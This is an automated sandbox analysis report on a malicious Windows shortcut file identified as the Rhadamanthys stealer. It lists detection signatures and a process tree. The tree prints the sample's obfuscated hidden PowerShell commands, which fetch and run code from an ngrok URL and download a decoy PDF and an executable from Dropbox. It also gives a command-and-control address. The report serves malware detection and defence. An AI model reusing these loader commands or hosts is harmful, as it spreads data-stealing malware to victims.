Edit tour
Windows
Analysis Report
IIC0XbKFjS.lnk
Overview
General Information
Sample name: | IIC0XbKFjS.lnkrenamed because original name is a hash value |
Original sample name: | 39c977bba06879b884082e63185eb698c4512a6af48b9dc23cda346d7d91ce44.lnk |
Analysis ID: | 1576695 |
MD5: | 49762c491b56e899a9d314d3260834e4 |
SHA1: | 999198469e4f0cf6186779655b0231bb7225f5ae |
SHA256: | 39c977bba06879b884082e63185eb698c4512a6af48b9dc23cda346d7d91ce44 |
Tags: | Compilazioneprotetticopyrightlnkuser-JAMESWT_MHT |
Infos: | |
Detection
RHADAMANTHYS
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Powerup Write Hijack DLL
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows shortcut file (LNK) contains suspicious command line arguments
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Detected suspicious crossdomain redirect
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Classification
- System is w10x64
- cmd.exe (PID: 716 cmdline:
"C:\Window s\System32 \cmd.exe" /c pOweRsH eLL -wIndo WStYLe hiD deN -c set -alias aa8 357 curl ; sal av4fb 5 iEx ; av 4fb5(aa835 7 -Uri htt ps://1zf9c ygs0q3iviy owq83ddwzw tgf78rh.ng rok.app/ap i/secure/a 53f93d4300 5d4ee2fadb 95063c82fe f -UseBasi cParsing) MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1880 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 2276 cmdline:
pOweRsHeLL -wIndoWSt YLe hiDdeN -c set-al ias aa8357 curl ; sa l av4fb5 i Ex ; av4fb 5(aa8357 - Uri https: //1zf9cygs 0q3iviyowq 83ddwzwtgf 78rh.ngrok .app/api/s ecure/a53f 93d43005d4 ee2fadb950 63c82fef - UseBasicPa rsing) MD5: 04029E121A0CFA5991749937DD22A1D9) - msedge.exe (PID: 7656 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --kiosk https://w ww.dropbox .com/scl/f i/w47rcqep fnwm2w25ys bw7/Docume nts-about- company-in formation- and-job-de scriptions -2.pdf?rlk ey=yz6h1qi h6tkldgdp6 erbolsb5&d l=1 MD5: BF154738460E4AB1D388970E1AB13FAB) - msedge.exe (PID: 7952 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=22 40 --field -trial-han dle=2104,i ,126970922 5500895076 7,14485644 1082920612 06,262144 /prefetch: 3 MD5: BF154738460E4AB1D388970E1AB13FAB) - cmd.exe (PID: 8760 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Local \Temp\1357 945884.bat " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8772 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 8836 cmdline:
powershell -wIndoWSt YLe hiDdeN -NoProfil e -Command "$RandomP DF = Join- Path -Path $env:TEMP -ChildPat h ('{0}.pd f' -f ([gu id]::NewGu id())); $R andomEXE = Join-Path -Path $en v:TEMP -Ch ildPath (' {0}.exe' - f ([guid]: :NewGuid() )); Invoke -WebReques t -Uri 'ht tps://www. dropbox.co m/scl/fi/w 47rcqepfnw m2w25ysbw7 /Documents -about-com pany-infor mation-and -job-descr iptions-2. pdf?rlkey= yz6h1qih6t kldgdp6erb olsb5&dl=1 ' -OutFile $RandomPD F; Start-P rocess -Fi lePath 'ms edge.exe' -ArgumentL ist '--kio sk', $Rand omPDF; Inv oke-WebReq uest -Uri 'https://w ww.dropbox .com/scl/f i/g33vds4u vy26a8v7bl e7g/runner .exe?rlkey =cqe2asmea 4sh0uo2xxs stxzdd&dl= 1' -OutFil e $RandomE XE; Start- Process -F ilePath $R andomEXE; if (Test-P ath $Rando mEXE) { In voke-WebRe quest -Uri 'https:// 1zf9cygs0q 3iviyowq83 ddwzwtgf78 rh.ngrok.a pp/metadat a/a53f93d4 3005d4ee2f adb95063c8 2fef'; }" MD5: 04029E121A0CFA5991749937DD22A1D9) - msedge.exe (PID: 1372 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --kiosk C:\Users\ user\AppDa ta\Local\T emp\130e96 9b-e5c7-43 40-a2cf-7f 225f49c2e1 .pdf MD5: BF154738460E4AB1D388970E1AB13FAB) - msedge.exe (PID: 4092 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=20 60 --field -trial-han dle=2076,i ,726979028 2786459060 ,139548845 8064509875 9,262144 / prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB) - 9840ee24-ca7e-4dd6-a855-1e9dc96f8845.exe (PID: 9064 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\9840ee 24-ca7e-4d d6-a855-1e 9dc96f8845 .exe" MD5: 9BFDFAADE8C1612270DA2A69959756A7) - 9840ee24-ca7e-4dd6-a855-1e9dc96f8845.exe (PID: 6852 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\9840ee 24-ca7e-4d d6-a855-1e 9dc96f8845 .exe" MD5: 9BFDFAADE8C1612270DA2A69959756A7) - fontdrvhost.exe (PID: 7412 cmdline:
"C:\Window s\System32 \fontdrvho st.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D) - fontdrvhost.exe (PID: 2276 cmdline:
"C:\Window s\System32 \fontdrvho st.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F) - WerFault.exe (PID: 3160 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 6 852 -s 420 MD5: C31336C1EFC2CCB44B4326EA793040F2) - WerFault.exe (PID: 6072 cmdline:
C:\Windows \system32\ WerFault.e xe -u -p 2 276 -s 144 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
- svchost.exe (PID: 7796 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- msedge.exe (PID: 7932 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --kiosk --flag-sw itches-beg in --flag- switches-e nd --disab le-nacl -- do-not-de- elevate ht tps://www. dropbox.co m/scl/fi/w 47rcqepfnw m2w25ysbw7 /Documents -about-com pany-infor mation-and -job-descr iptions-2. pdf?rlkey= yz6h1qih6t kldgdp6erb olsb5&dl=1 MD5: BF154738460E4AB1D388970E1AB13FAB) - msedge.exe (PID: 1008 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=20 76 --field -trial-han dle=2004,i ,612519613 4689574835 ,164046872 0169619032 7,262144 / prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB) - msedge.exe (PID: 8636 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=ass et_store.m ojom.Asset StoreServi ce --lang= en-GB --se rvice-sand box-type=a sset_store _service - -mojo-plat form-chann el-handle= 6760 --fie ld-trial-h andle=2004 ,i,6125196 1346895748 35,1640468 7201696190 327,262144 /prefetch :8 MD5: BF154738460E4AB1D388970E1AB13FAB) - msedge.exe (PID: 8648 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=ent ity_extrac tion_servi ce.mojom.E xtractor - -lang=en-G B --servic e-sandbox- type=entit y_extracti on --onnx- enabled-fo r-ee --moj o-platform -channel-h andle=6912 --field-t rial-handl e=2004,i,6 1251961346 89574835,1 6404687201 696190327, 262144 /pr efetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB) - identity_helper.exe (PID: 9048 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \117.0.204 5.55\ident ity_helper .exe" --ty pe=utility --utility -sub-type= winrt_app_ id.mojom.W inrtAppIdS ervice --l ang=en-GB --service- sandbox-ty pe=none -- mojo-platf orm-channe l-handle=7 480 --fiel d-trial-ha ndle=2004, i,61251961 3468957483 5,16404687 2016961903 27,262144 /prefetch: 8 MD5: F8CEC3E43A6305AC9BA3700131594306) - identity_helper.exe (PID: 9060 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \117.0.204 5.55\ident ity_helper .exe" --ty pe=utility --utility -sub-type= winrt_app_ id.mojom.W inrtAppIdS ervice --l ang=en-GB --service- sandbox-ty pe=none -- mojo-platf orm-channe l-handle=7 480 --fiel d-trial-ha ndle=2004, i,61251961 3468957483 5,16404687 2016961903 27,262144 /prefetch: 8 MD5: F8CEC3E43A6305AC9BA3700131594306) - msedge.exe (PID: 8784 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=edg e_collecti ons.mojom. Collection sDataManag er --lang= en-GB --se rvice-sand box-type=c ollections --mojo-pl atform-cha nnel-handl e=7932 --f ield-trial -handle=20 04,i,61251 9613468957 4835,16404 6872016961 90327,2621 44 /prefet ch:8 MD5: BF154738460E4AB1D388970E1AB13FAB) - msedge.exe (PID: 2248 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= ppapi --la ng=en-GB - -device-sc ale-factor =1 --ppapi -antialias ed-text-en abled=1 -- ppapi-subp ixel-rende ring-setti ng=1 --moj o-platform -channel-h andle=7392 --field-t rial-handl e=2004,i,6 1251961346 89574835,1 6404687201 696190327, 262144 /pr efetch:6 MD5: BF154738460E4AB1D388970E1AB13FAB) - msedge.exe (PID: 8516 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=edg e_search_i ndexer.moj om.SearchI ndexerInte rfaceBroke r --lang=e n-GB --ser vice-sandb ox-type=se arch_index er --messa ge-loop-ty pe-ui --mo jo-platfor m-channel- handle=690 4 --field- trial-hand le=2004,i, 6125196134 689574835, 1640468720 1696190327 ,262144 /p refetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Rhadamanthys | According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search user. |
{"C2 url": "https://104.161.43.18:2845/7e56fc199c7194d0/qc1o4gn8.mjfvk"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
Click to see the 4 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
System Summary |
---|
Source: | Author: Subhash Popuri (@pbssubhash): |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |